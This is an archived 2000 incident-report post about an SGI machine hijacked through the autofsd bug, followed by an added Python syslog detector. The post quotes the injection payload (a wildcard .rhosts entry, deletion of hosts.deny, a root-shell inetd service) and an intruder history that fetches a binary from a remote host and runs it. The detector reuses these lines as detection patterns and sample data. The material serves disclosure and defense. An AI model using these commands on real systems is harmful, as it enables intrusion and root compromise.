Security Incidents mailing list archives

Hacked by the script kiddie - an ordinary netadmin's day


From: urbanec () CIV ZCU CZ (Jakub Urbanec)
Date: Wed, 21 Jun 2000 10:40:32 +0200


Hi,

One of our machines was hacked on Jun 6 by (probably) the script kiddie
from 216-119-26-75.o1.jps.net :-(

Fortunately he/she left almost everything we needed for identifying the
source of the attack - full syslog dump, history file, suid binaries,
backdoor binaries.

 <attention>Full names/IPs included!</attention>

The method of the hack was a good old SGI autofsd bug - more in syslog:

  autofsd[229]: mount of /hosts/;echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; \
  echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob

followed by:

  login[85169]: root@216-119-26-75.o1.jps.net as root

After that he/she added a user 'adm' (thanks for the history file!) and installed
binaries - the interesting one is a trinoo (DDoS) agent (as well as 'cocaine',
'gibd00r?' and a bind shell).

So, here's the history file of user 'adm':

# /bin/ls -C $*; }
# nslookup our.machine.here
# ft
# cd /dev/chr
# ftp charlie.cns.iit.edu
# chmod +sx *
# ./eggdrop doomed.tcl
# exit
# /bin/ls -C $*; }
# ./c
# /bin/ls -C $*; }
# cd /tmp
# ls
# rcp enter@208.243.33.204:/usr/people/enter/irix/c c; chmod 755 c;
# ./c 212.179.33.90 23
# ./c 63.236.135.128 23
# /bin/ls -C $*; }
# ls
# ./c 216.98.156.92 23
#

where ./c is probably 'cocaine' (courtesy of 'strings' - I'm damn sure I
have seen this application before, but I couldn't find any info about it
- does anybody have a clue?). I have the binaries and logs; I can put them on
the web if anybody needs them.

        Sorry about the lengthy email, but I think you may be interested
        in how the script kiddies work and how a DDoS tool gets installed.

P.S. I.   The hacked machine was taken down and installed from scratch.

P.S. II.  The IPs/hosts mentioned above were already notified about this
          incident.

P.S. III. Never plug a default-installed SGI box into the public net:

"...vanilla SGI boxes screaming "hack me pleeeease, my vendor did such a
great job of making it eeeeeeasy" all over the place..."
               "Playing redir games with ARP and ICMP" by Yuri Volobuev

                                        Jakub CUBA++ Urbanec

--
 .................................................................
 Univerzitni 20   tel.:+420-19-7491538        Jakub Cuba++ Urbanec
 306 14,  Plzen   http://home.zcu.cz/~urbanec          LPS-CIV-ZCU
 Czech Republic

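An added example, not code from Jakub's mail: a small Python detector that runs over syslog lines in the shape of the two quoted above and flags the indicators this incident left behind (shell metacharacters inside an autofsd mount path, a wildcard written to /.rhosts, removal of the TCP wrapper files, an inetd started on a config outside /etc, and a root login from a remote host). The timestamps and the host name "irixbox" in the sample log are constructed; the autofsd and login lines reproduce the evidence from the mail, and the remaining lines are benign traffic added so the rules have something to ignore.

```python
"""Syslog triage for the autofsd command-injection pattern and its follow-on
indicators. Added example for this archive page, not part of the original mail."""
import re
from dataclasses import dataclass

# Constructed sample log: timestamps and the host name "irixbox" are made up;
# the autofsd and login lines are the ones quoted in the mail, the rest are
# benign lines added so that the rules have something to ignore.
SAMPLE_SYSLOG = """\
Jun  6 03:11:02 irixbox autofsd[229]: mount of /hosts/;echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
Jun  6 03:11:40 irixbox login[85169]: root@216-119-26-75.o1.jps.net as root
Jun  6 03:20:00 irixbox autofsd[229]: mount of /hosts/fileserver
Jun  6 08:00:00 irixbox login[85200]: alice@workstation.example.org as alice
Jun  6 08:05:00 irixbox login[85201]: root@localhost as root
"""


@dataclass(frozen=True)
class Finding:
    rule: str    # short rule name
    detail: str  # the extracted piece of evidence
    line: str    # the full log line that triggered the rule


# Shell metacharacters that have no business in an automounter path.
SHELL_META = re.compile(r"[;|&`$()]")
AUTOFSD_MOUNT = re.compile(r"autofsd\[\d+\]: mount of (?P<path>.*)$")
# '+ +' in .rhosts trusts every user on every host.
RHOSTS_WILDCARD = re.compile(r"\+ \+.*\.rhosts")
WRAPPER_REMOVAL = re.compile(r"\brm\b.*\bhosts\.(deny|allow)\b")
# An inetd service line that hands a root shell to whoever connects.
ROOT_SHELL_SERVICE = re.compile(r"stream\s+tcp\s+nowait\s+root\s+\S*\bsh\b")
# inetd started on an explicit config file (the stock one is /etc/inetd.conf).
ROGUE_INETD = re.compile(r"\binetd\s+(?P<conf>/\S+)")
REMOTE_ROOT_LOGIN = re.compile(r"login\[\d+\]: root@(?P<host>\S+) as root")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def scan_line(line: str) -> list[Finding]:
    """Apply every rule to one syslog line and return the findings in rule order."""
    findings = []
    m = AUTOFSD_MOUNT.search(line)
    if m and SHELL_META.search(m.group("path")):
        findings.append(Finding("autofsd_injection", m.group("path"), line))
    if RHOSTS_WILDCARD.search(line):
        findings.append(Finding("rhosts_wildcard", "'+ +' written to .rhosts", line))
    if WRAPPER_REMOVAL.search(line):
        findings.append(Finding("tcp_wrapper_removed", "hosts.deny/hosts.allow removed", line))
    if ROOT_SHELL_SERVICE.search(line):
        findings.append(Finding("root_shell_service", "inetd service spawning a root shell", line))
    m = ROGUE_INETD.search(line)
    if m and m.group("conf") != "/etc/inetd.conf":
        findings.append(Finding("rogue_inetd", m.group("conf"), line))
    m = REMOTE_ROOT_LOGIN.search(line)
    if m and m.group("host") not in LOCAL_HOSTS:
        findings.append(Finding("remote_root_login", m.group("host"), line))
    return findings


def scan(text: str) -> list[Finding]:
    """Run scan_line over a whole syslog extract, skipping blank lines."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


def rhosts_is_wildcarded(content: str) -> bool:
    """Host-side check: True if an .rhosts file trusts every host ('+' in the host field)."""
    for raw in content.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.split()[0] == "+":
            return True
    return False


if __name__ == "__main__":
    for f in scan(SAMPLE_SYSLOG):
        print(f"{f.rule:20} {f.detail}")
```

The rules are deliberately narrow: the automounter rule fires only when the mount path itself carries shell metacharacters, and the root-login rule ignores local console logins, so a normal day of autofsd and login traffic produces no findings while the quoted line lights up five rules at once.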